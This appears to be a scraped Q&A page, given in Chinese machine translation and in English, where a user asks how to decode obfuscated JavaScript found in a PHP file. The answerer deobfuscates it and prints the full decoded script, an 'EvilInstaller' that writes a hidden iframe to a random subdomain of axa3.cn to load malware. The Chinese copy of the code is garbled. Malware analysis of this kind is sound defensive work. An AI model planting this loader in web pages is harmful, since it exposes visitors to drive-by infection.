你会如何逆向工程? [英] How would you reverse engineer this?
问题描述
我有一些代码位于JavaScript文件的底部。它经历了许多怪异的扭曲,如将十六进制转换为ascii,然后执行正则表达式替换,执行代码等等。
有什么方法可以找出它正在执行什么
pastebin.ca/1303597rel =nofollow noreferrer> http://pastebin.ca/1303597
你可以逐步浏览它 - 因为它是Javascript,并且它被解释了,它必须是它自己的解密器。如果您有权访问命令行的Javascript解释器(例如 Firebug 中的控制台),那么这将是公平的直接。
我会看看会发生什么。
编辑我已经完成了大部分工作 - 看起来最后一步并非微不足道,可能是因为它涉及到argument.callee。无论如何,我已经在Pastebin上贴出我目前所拥有的。
有趣的是,我发现其中最难的部分是给乱码变量命名。它让我想起了一个填字游戏,或者是数独游戏,在那里你知道事情是如何相关的,但是在你弄清楚它的依赖部分是什么之前,你不能确定地分配一些东西。 :-)我相信,如果有人认识到算法,他们可以给这些部分更有意义的名称,但是在发生大量异或操作的位置,有两个临时变量我刚刚作为其默认名称因为我不知道足够的上下文来给他们有用的。
Final edit :当我我意识到我可以传入原始文本,我讽刺地只是解码(这是一个非常聪明的技术,所以正常的反混淆将不起作用,因为当然,一旦你重命名变量等,值是不同的)。无论如何,这里是你的脚本完整:
function EvilInstaller(){};
EvilInstaller.prototype = {
getFrameURL:function(){
var dlh = document.location.host;
returnhttp+'://'+((dlh ==''|| dlh =='undefined')?this.getRandString():'')+ dlh.replace(/ [^ a -z0-9 .-] /,'。')。replace(/\.+/,'。')+。 + this.getRandString()+。 + this.host + this.path;
},
path:'/ elanguage.cn/',
cookieValue:1,
setCookie:function(name,value){
var d = new Date ();
d.setTime(new Date()。getTime()+ 86400000);
document.cookie = name +=+ escape(value)+; expires =+ d.toGMTString();
},
install:function(){
if(!this.alreadyInstalled()){
var s =< div style ='display:none'> < iframe src ='+ this.getFrameURL()+'>< / iframe>< / div>
尝试{
document.open();
document.write(s);
document.close();
catch {e} {
document.write(< html>< body>+ s +< / body>< / html>)
}
this.setCookie(this.cookieName,this.cookieValue);
$ getRandString:function(){
var l = 16,c ='0Z1&2Q3Z4 * 5&6Z7Q8 * 9)a * b * cQdZeQf *'。replace(/ [ZQ&\ * \)] / g,'');
var o =''; (Math.floor(Math.random()* c.length),1,1);
for(var i = 0; i <1; i ++){
o + = c.substr
}
return o;
},
cookieName:'hedcfagb',
host:'axa3.cn',
alreadyInstalled:function(){
return!(document.cookie.indexOf (this.cookieName +'='+ this.cookieValue)== -1);
}
};
var evil = new EvilInstaller();
evil.install();
基本上它看起来像从axa3.cn加载恶意软件。这个网站已经被ISP怀疑了,所以不知道上面的内容是什么,并且超出了一般的坏处。
(如果有人感兴趣,我使用Pastebin作为伪-VCS代码的变化版本,因此您可以在我的第一个编辑帖子后稍微看到另一个中间步骤 。看到不同层次的混淆以及它们是如何改变的,非常有趣。)
I've got some code that was at the bottom of a php file that is in javascript. It goes through lots of weird contortions like converting hex to ascii then doing regex replacements, executing code and so on...
Is there any way to find out what it's executing before it actually does it?
The code is here:
You can just go through it stage by stage - since it's Javascript, and it's interpreted, it needs to be its own decryptor. If you have access to a command-line Javascript interpreter (such as the Console in Firebug), this will be fairly straightforward.
I'll have a look and see what comes up.
Edit I've got through most of it - it seems like the final step is non-trivial, probably because it involves "argument.callee". Anyway I've put up what I have so far on Pastebin.
Interestingly I found the hardest part of this was giving the gibberish variables proper names. It reminded me of a crossword, or sudoku, where you know how things are related, but you can't definitively assign something until you work out what its dependant parts are. :-) I'm sure that if someone recognises the algorithm they can give the parts more meaningful names, but at the bit where there's a lot of XORing going on, there are two temporary variables that I've just left as their default names since I don't know enough context to give them useful ones.
Final edit: The 'arguments.callee' bit became easy when I realised I could just pass in the raw text that I'd ironically just been decoding (it's quite a clever technique, so that normal deobfuscation won't work because of course once you rename the variables, etc, the value is different). Anyway, here's your script in full:
function EvilInstaller(){};
EvilInstaller.prototype = {
getFrameURL : function() {
var dlh=document.location.host;
return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.host + this.path;
},
path:'/elanguage.cn/',
cookieValue:1,
setCookie : function(name, value) {
var d= new Date();
d.setTime(new Date().getTime() + 86400000);
document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString();
},
install : function() {
if (!this.alreadyInstalled()) {
var s = "<div style='display:none'><iframe src='" + this.getFrameURL() + "'></iframe></div>"
try {
document.open();
document.write(s);
document.close();
}
catch(e) {
document.write("<html><body>" + s + "</body></html>")
}
this.setCookie(this.cookieName, this.cookieValue);
}
},
getRandString : function() {
var l=16,c='0Z1&2Q3Z4*5&6Z7Q8*9)a*b*cQdZeQf*'.replace(/[ZQ&\*\)]/g, '');
var o='';
for (var i=0;i<l;i++) {
o+=c.substr(Math.floor(Math.random()*c.length),1,1);
}
return o;
},
cookieName:'hedcfagb',
host:'axa3.cn',
alreadyInstalled : function() {
return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
}
};
var evil=new EvilInstaller();
evil.install();
Basically it looks like it loads malware from axa3.cn. The site is already suspected by the ISP though, so no telling what was actually there above and beyond general badness.
(If anyone's interested, I was using Pastebin as a pseudo-VCS for the changing versions of the code, so you can see another intermediate step, a little after my first edit post. It was quite intriguing seeing the different layers of obfuscation and how they changed.)
这篇关于你会如何逆向工程?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
